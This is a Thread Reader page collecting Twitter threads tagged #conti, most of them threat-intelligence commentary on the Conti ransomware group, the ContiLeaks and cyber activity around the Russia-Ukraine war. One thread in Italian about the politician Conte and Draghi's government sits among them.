Discover and read the best of Twitter Threads about #conti

Most recents (9)

Thread on #APT grps, #hacktivists, #Ransomware gangs with their ‘likely’ associations (as per TTPs and reports) that are playing a significant role in impending #Ukraine #Russian conflict. Correct me if i am wrong or missing any one. 1/
Firstly on Russian 🇷🇺side there are #GhostWriter (#Belarus Govt Backed) #CozyBear (Russian Foreign Intel aka #SVR) #UNC1151 (Minsk based) #FancyBears & #SandWorm (Russian Military Intel aka #GRU) #Turla and #Gamaredon (Russian Internal Intel #FSB Former KGB) 2/
Read 7 tweets
The #ContiLeaks contained some messages consisting of IP:Username:pass combinations for #Conti infrastructure.
This allows us to connect certain #Trickbot activcity with the #Conti group:

1/x Image
The IP's in the image are the following:
117.252.69[.]134
117.252.68[.]15
116.206.153[.]212
103.78.13[.]150
103.47.170[.]131
103.47.170[.]130
118.91.190[.]42
117.197.41[.]36
117.222.63[.]77
117.252.69[.]210

2/x
Using @MaltegoHQ together with OTX/Alienvault and
@virustotal integration, we are able to connect several of these IP's to #Trickbot activity:

3/x Image
Read 8 tweets
NEW 🧵on Conti...

We published some news this week about Conti. In brief, a #Conti affiliate infiltrated the network of a healthcare provider that a different #ransomware threat actor had already penetrated.

The technical debt in healthcare is dangerous.

1/23
But Conti, in particular, attracts a particularly aggressive group of affiliates. And we have another, previously untold, Conti-adjacent story about one of their ransomware affiliates.

It serves as a cautionary tale that not all attackers are necessarily after a ransom. 2/23
This past January we were contacted by a customer in the Middle East to investigate a malware incident that began in mid-December, 2021. The target, in the financial services industry, discovered lateral movement and backdoors in their network the week before new year's day. 3/23
Read 23 tweets
Last year, we got an anonymous tip that "a global cyber crime group acting on an FSB order has hacked one of your contributors. The only thing they were interested on, was anything related to your @navalny investigation". We took enormous measures to upgrade our e-security (1/n)
We tried to figure out what that cyber-crime group was - that apparently takes orders from the FSB. The Russian invasion of Ukraine finally brought the answer. A pro-Ukraine hacker from that cyber-crime group leaked their internal chats. It's the #conti group.
Here is the chat between two conti hackers (h/t @HarioMenkel) Image
Read 4 tweets
Financially-motivated cybercriminals are usually staying away from politics, but when politics hit close to home, they strike back. In this thread, we share a quick recap of the most interesting initiatives and discussions about #UkraineRussiaConflict on cybercrime forums. Image
A user on CrdClub proposed to organize a fundraiser to support the families and children in Ukraine. The author shared a BTC wallet that was issued by the forum’s admin specifically for this cause. Image
A user on Exploit published a post asking Russian citizens to participate in protests against the war. Other users commented that regardless of the forum’s rules, it is highly important to discuss the matter and state such opinions out loud. However, the thread was deleted. Image
Read 8 tweets
Yesterday, the U.S. Treasury Department announced extensive sanctions against Russian businesses and elites following the country’s invasion of Ukraine. This has prompted many to ask Chainalysis how Russia may attempt to use cryptocurrency to evade sanctions.
As is true in traditional finance, some may use crypto for sanctions evasion. But the inherent transparency of blockchains combined with Chainalysis data & tools gives governments and crypto businesses the ability to identify transactions by sanctioned entities and take action.
It’s unlikely that individuals designated in yesterday’s sanctions would move large quantities of crypto now. Russian elites and financial authorities have likely been preparing for sanctions, and would have carried out those transactions slowly over the past few months.
Read 12 tweets
[Thread]
Vu l'importance des événements en cours en #Ukraine nous ouvrons un thread sur les articles qui traitent des cyberattaques.

N'hésitez pas à nous envoyer vos sources. L'objectif est de rassembler un maximum de contenus.

On commence avec "wiper" numerama.com/cyberguerre/86…
L'Anssi demande aux entreprises et aux administrations de renforcer leurs défenses.

lefigaro.fr/secteur/high-t…
Coupure d'Internet à Kharkiv (une des premières villes attaquées).

numerama.com/politique/8653…
Read 48 tweets
[1/5]

LATEST NEWS: Both @CISAgov and @FBI just released an advisory on #Conti #ransomware, which they’ve recently observed being used to attack US and international organizations.

Learn more about Conti’s attack chain and tactics here 👉 research.trendmicro.com/3lOTxrx
[2/5]

#Conti operators use several methods to gain initial access like spear phishing and exploiting public-facing applications, followed by the use of Cobalt Strike. We investigated how Conti #ransomware operators used Cobalt Strike to launch attacks: research.trendmicro.com/3CDba4C
[3/5]

Aside from Cobalt Strike, #Rclone is another legitimate tool abused by Conti operators in their previous campaigns. We discuss some of the most commonly abused legitimate tools here 👉 research.trendmicro.com/2W8cNaS
Read 5 tweets
#Conte sale al Quirinale per il #ConteTer, ma in parlamento non ottiene i voti. È l’ora del #GovernoDraghi.

L’ex presidente #Bce riceve l'incarico dal Presidente della repubblica, fa il suo discorso programmatico parlando di #generazioni future, di #produttività, #sostenibilità.
Umiltà e pragmatismo. Di #ZombieEconomics e #DebitoCattivo.

In Camera e Senato si spellano le mani, i giornali riportano commenti estasiati e prolisse biografie che iniziano dal collegio dei gesuiti per passare dal Britannia.

Il Paese è in #LunaDiMiele.
Honey moon con sondaggi pro Draghi che fanno invidia a Xi Jinping nel politburo.

Ottiene la fiducia con percentuali bulgare: lo ha votato tre quarti del parlamento. Uniche mosche bianche, guardate con spregio dai giornalisti in Transatlantico, sono solo un paio di partiti
Read 17 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!